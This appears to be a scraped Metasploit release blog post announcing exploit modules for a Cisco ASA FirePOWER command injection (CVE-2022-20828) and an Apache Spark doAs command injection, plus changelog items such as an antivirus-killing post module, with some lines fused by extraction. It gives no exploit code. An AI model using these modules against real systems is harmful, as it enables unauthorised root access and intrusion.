8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
jbaines-r7 added a new module that exploits an authenticated command injection vulnerability CVE-2022-20828 of Cisco ASA-X with FirePOWER Services. This vulnerability affects all Cisco ASA appliances that support ASA FirePOWER module. Note that, although a patch has been added to most recent ASA FirePOWER module versions such as 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21, some versions such as 6.2.2 and earlier, 6.3, 6.5, and 6.7 will not receive the patch. This exploit could allow the attacker to get root access and pivot to the inside network along with the outside network. This exploit takes advantage of the FirePower Services SFR moduleβs Linux virtual machine via ASAβs ASDM web server which also runs snort on the traffic. Therefore, an attacker can have access to the diverted traffic as well. Check out the video of the exploit for more information!
KostyaKortchinsky and h00die-gr3y introduced a new module that exploits a remote code execution vulnerability CVE-2022-33891 in Apache Spark. This exploit affects several Apache Spark versions such as 3.0.3 and earlier, 3.1.1 to 3.1.2 and versions 3.2.0 to 3.2.1. Apache Spark allows its users to enable Access Control Lists (ACLs) via the configuration option spark.acls.enable
. This was introduced in order to improve the security access within Apache Spark application but the code thatβs triggered by this configuration option leads to a malicious shell command injection vulnerability. Check out this post by HuskyHacks who provided more information along with great examples!
spark.acls.enable
setting permits command injection through the id
command via a POST request to Apache Sparkβs base endpoint containing arbitrary code in the doAs
parameter. The exploit achieves unauthenticated RCE as the spark
user.post/windows/manage/killav.rb
script has been updated to support shell and PowerShell sessions and has undergone some code cleanup. Additionally, documentation has now been created to explain its operations and how to use it.post/windows/gather/memory_dump
module.#run_sql
post method.domain_controller?
method to allow lower-priv users to invoke it, extends it to support shell sessions, and adds additional useful domain controller enumeration methods to the library.cmd/unix/reverse_ssh
that stopped reverse SSH sessions from opening.rpc.call('db.analyze_host', { host: '<metasploitable3 ip>', workspace: 'other' } )
.find
commandβs perm
parameter while also maintaining support for the deprecated syntax.Rex::Proto::Http::Client
to rely on Rubyβs built in string comparison.As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo(master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers(which also include the commercial edition).
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C